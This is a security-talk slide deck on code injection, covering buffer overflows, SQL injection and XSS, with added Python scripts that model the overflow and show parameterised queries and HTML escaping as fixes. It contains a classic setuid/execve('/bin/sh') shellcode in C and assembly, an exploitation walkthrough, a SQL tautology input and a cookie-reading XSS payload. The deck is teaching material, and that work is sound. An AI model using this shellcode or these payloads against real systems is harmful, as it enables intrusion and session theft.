Application Security: Understanding and Preventing Code Injection
By Aseem Jakhar
About me
Open source and security phreak.
LinkedIn, null.co.in
Agenda
- What is code injection
- Common code injection techniques
  - Buffer overflow
  - SQL injection
  - Cross-site scripting (XSS)
What is code injection?
- Every program interfaces with the outer world: input and output.
- Invalid data.
- Injecting code instead of data and executing it as part of the program.
Buffer overflow
- No check on input length.
- The buffer overflows and overwrites the stack.
- The return address is overwritten.
- The return address can be invalid or point back to user input.
Function call
    void foo(int a, int b, ..., int n)
Stack grows towards low memory.
Caller:
    push arg n
    ...
    push arg b
    push arg a
    push return address   # eip
foo:
    push ebp              # ebp
    mov esp, ebp
    sub $0x08, esp        # local variables
How does the stack look?
Example vulnerable code
    #include <string.h>

    int vul_func(char *src)
    {
        char vul_buf[40] = {0};
        /* ... */
        strcpy(vul_buf, src);   /* no length check: a src longer than 39 bytes overflows vul_buf */
        /* ... */
        return 0;
    }
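The frame layout from the "Function call" slide and the vul_func() code above, modelled in Python as an added example (this is not code from the talk): vul_buf[40] sits at the low end of the frame, followed by the saved ebp and the return address, so an unbounded strcpy() of the 1000 'A' input runs through both. The saved-register values and the canary value are constructed sample numbers, and the canary variant is my illustration of what a compiler stack protector places between the buffer and the saved registers.

```python
"""Model of the 32-bit x86 stack frame of vul_func() from the slides.

Layout (low address -> high address), as the slide's prologue produces it:
    [ vul_buf: 40 bytes ][ saved ebp: 4 ][ return address: 4 ]
strcpy() fills from the low end upward, so an over-long src runs through the
saved ebp and then the return address.  All addresses below are constructed
sample values, not taken from a real binary.
"""
import struct

BUF_SIZE = 40      # char vul_buf[40]
WORD = 4           # 32-bit registers and pointers

SAMPLE_EBP = 0xBFFFF6D8   # constructed saved frame pointer
SAMPLE_RET = 0x08048456   # constructed return address into the caller


def build_frame(canary=None):
    """Lay out vul_func's frame as a bytearray.  With canary set, a guard word
    is placed between the buffer and the saved registers, as a compiler
    stack protector would do (illustration, not a specific compiler's layout)."""
    frame = bytearray(BUF_SIZE)
    if canary is not None:
        frame += struct.pack("<I", canary)
    frame += struct.pack("<I", SAMPLE_EBP)
    frame += struct.pack("<I", SAMPLE_RET)
    return frame


def strcpy_model(frame, src):
    """strcpy() semantics: copy up to and including the NUL, with no bound.
    Only the bytes that land inside this frame are modelled."""
    data = src.split(b"\x00", 1)[0] + b"\x00"
    n = min(len(data), len(frame))
    frame[:n] = data[:n]
    return frame


def bounded_copy(frame, src):
    """The fix: check the length before copying (or use a bounded copy such
    as snprintf/strlcpy) so nothing past vul_buf is ever written."""
    if len(src) >= BUF_SIZE:
        raise ValueError("input longer than vul_buf, refusing to copy")
    frame[:len(src)] = src
    frame[len(src)] = 0
    return frame


def epilogue(frame, canary=None):
    """What the function would pop on return: ebp and eip, plus whether the
    guard word survived.  This mirrors the registers inspected in the core dump."""
    off = BUF_SIZE
    guard_ok = True
    if canary is not None:
        guard_ok = struct.unpack_from("<I", frame, off)[0] == canary
        off += WORD
    saved_ebp = struct.unpack_from("<I", frame, off)[0]
    ret_addr = struct.unpack_from("<I", frame, off + WORD)[0]
    return {"ebp": saved_ebp, "eip": ret_addr, "guard_ok": guard_ok}


if __name__ == "__main__":
    too_long = b"A" * 1000                       # the perl 'A' x 1000 input
    r = epilogue(strcpy_model(build_frame(), too_long))
    print("unchecked strcpy: ebp=%#x eip=%#x" % (r["ebp"], r["eip"]))
    guard = 0xDEADBEEF                           # constructed canary value
    g = epilogue(strcpy_model(build_frame(guard), too_long), guard)
    print("with stack guard: guard_ok=%s (abort before returning)" % g["guard_ok"])
    try:
        bounded_copy(build_frame(), too_long)
    except ValueError as err:
        print("bounded copy:", err)
```

With the unchecked copy both saved ebp and eip read back as 0x41414141, which is exactly the value the "Feed the application" slide tells you to look for in the core dump; the guard word turns the same input into a detected abort instead of a hijacked return, and the length check prevents the write altogether.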
Exploiting buffer overflow
- Feed the application; check the registers, return address, shellcode offset/start.
- Create the shellcode with a stable return address.
- Test it.
- Binary pwned!!!
Feed the application
    $ perl -e "print 'A' x 1000"
    $ echo -en "AAAAAAAAAAAAAAAAAA"
- Pass the string to the application.
- Analyze the core dump; check eip and the other registers for 0x41414141.
- Find the length, offset and a valid return address for our shellcode.
Example shellcode: C
    setuid(0);
    execve("/bin/sh", NULL, NULL);
    $ gcc -static -o shell shell.c
    $ objdump --disassemble shell
Example shellcode: Assembly
    mov  $0xd5,%al        # syscall no. for setuid
    xor  %ebx,%ebx        # zero out ebx (pass 0 to setuid)
    int  $0x80            # software interrupt
    xor  %eax,%eax        # zero out eax
    mov  $11,%al          # syscall no. for execve(), stored in eax
    xor  %ebx,%ebx        # zero out ebx
    push %ebx             # push its value (zero): simple hack to avoid 0 bytes in the code
    push $0x68732f2f      # push the string (2nd half)
    push $0x6e69622f      # push the string (1st half); STRING == /bin//sh (same as /bin/sh)
    mov  %esp,%ebx        # 1st argument to execve(): address of 1st char in string
    xor  %ecx,%ecx        # 2nd argument to execve(): argv = NULL
    xor  %edx,%edx        # 3rd argument to execve(): envp = NULL
    int  $0x80
    $ as -o shell.o shell.s && ld -o shell shell.o
    $ objdump --disassemble shell
Demo
SQL injection
- The application sends user input to the DB.
- An SQL query is generated by adding user input directly to a string:
    SELECT field FROM table WHERE value = '$input';
- Works perfectly for valid input :-)
SQL injection
Input, meet bad data!
What if $input = foo' or 'a'='a
    SELECT field FROM table WHERE value = 'foo' or 'a'='a';
Voila!!!! Unauthorized access, manipulate the DB, delete tables, input wrong details.
SQL injection
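The two SQL injection slides above, as an added Python example (not code from the talk): the same "value = '$input'" lookup built by string concatenation and then with a bound parameter, run against an in-memory SQLite table. The accounts table, its rows and the column names are constructed for the example.

```python
"""Vulnerable vs parameterised form of the slide's lookup query, run against
an in-memory SQLite table.  Table, columns and rows are constructed."""
import sqlite3

# Constructed sample data.
ROWS = [
    ("alice", "alice@example.test"),
    ("bob", "bob@example.test"),
    ("carol", "carol@example.test"),
]


def make_db():
    """Create and populate the in-memory accounts table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (username TEXT, email TEXT)")
    con.executemany("INSERT INTO accounts VALUES (?, ?)", ROWS)
    return con


def lookup_vulnerable(con, user_input):
    """String concatenation, as on the slide: the input becomes part of the
    SQL grammar, so a quote in it rewrites the WHERE clause."""
    sql = "SELECT email FROM accounts WHERE username = '" + user_input + "'"
    return [row[0] for row in con.execute(sql)]


def lookup_safe(con, user_input):
    """Bound parameter: the driver sends the input as data, never as SQL,
    so quotes and keywords in it are just characters to compare against."""
    sql = "SELECT email FROM accounts WHERE username = ?"
    return [row[0] for row in con.execute(sql, (user_input,))]


if __name__ == "__main__":
    con = make_db()
    tautology = "foo' or 'a'='a"            # the slide's input
    print("valid input, concatenated: ", lookup_vulnerable(con, "bob"))
    print("valid input, parameterised:", lookup_safe(con, "bob"))
    print("tautology, concatenated:   ", lookup_vulnerable(con, tautology))
    print("tautology, parameterised:  ", lookup_safe(con, tautology))
```

For valid input both functions return the same single row; for the slide's tautology the concatenated version returns every account while the parameterised version returns nothing, because no username literally equals the string foo' or 'a'='a.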
XSS
Injecting script code.
- Non-persistent (reflected) XSS: the server reads the input and reflects it back.
    foo.com/search.php?q=<script-code>
- Persistent (stored) XSS: the script is injected into the web app and served to later visitors.
    <script>alert(document.cookie)</script>
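The reflected search page from the XSS slide, rendered two ways in an added Python example (not code from the talk): once echoing q straight into the HTML, once encoding it for the HTML text context. The page template and the cookie helper are constructed for the example; the HttpOnly attribute is a standard cookie flag that keeps document.cookie from exposing the session even if a script does run. Stored XSS is the same problem at output time: content read back from the database goes through the same encoding before it is placed in the page.

```python
"""Reflected search page (search.php?q=...) from the slide, rendered raw and
with output encoding.  The template and cookie helper are constructed."""
import html
from urllib.parse import parse_qs, urlsplit

# Constructed page template; {q} is where the search term is echoed.
PAGE = "<html><body><h1>Results for: {q}</h1></body></html>"


def query_from_url(url):
    """Extract q from foo.com/search.php?q=... (percent-decoded), '' if absent."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_unsafe(q):
    """What the vulnerable server does: echoes q into the HTML unchanged,
    so <script>...</script> in q becomes live markup."""
    return PAGE.format(q=q)


def render_safe(q):
    """Encode for the HTML text context: <, >, &, quotes become entities, so
    the browser displays the payload as text instead of executing it."""
    return PAGE.format(q=html.escape(q, quote=True))


def session_cookie_header(token):
    """Defence in depth for the slide's alert(document.cookie): an HttpOnly
    cookie is not readable from script, so a successful injection cannot
    read the session token this way."""
    return "Set-Cookie: session=%s; HttpOnly; Secure; SameSite=Lax" % token


if __name__ == "__main__":
    url = ("http://foo.com/search.php?q="
           "%3Cscript%3Ealert(document.cookie)%3C/script%3E")   # the slide's payload, URL-encoded
    q = query_from_url(url)
    print("reflected raw:    ", render_unsafe(q))
    print("reflected encoded:", render_safe(q))
    print(session_cookie_header("constructed-token"))
```

The raw rendering contains the script element verbatim; the encoded rendering contains &lt;script&gt; text that the browser shows to the user but never parses as a tag.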
Conclusion Never ever trust user input. Never ever trust user input. Never ever trust user input. Never ever trust user input. Never ever trust user input. Never ever trust user input.
Thank You! Q&A?
NULL is looking for phreaks. Contact: null@null.co.in

null Pune meet - Application Security: Code injection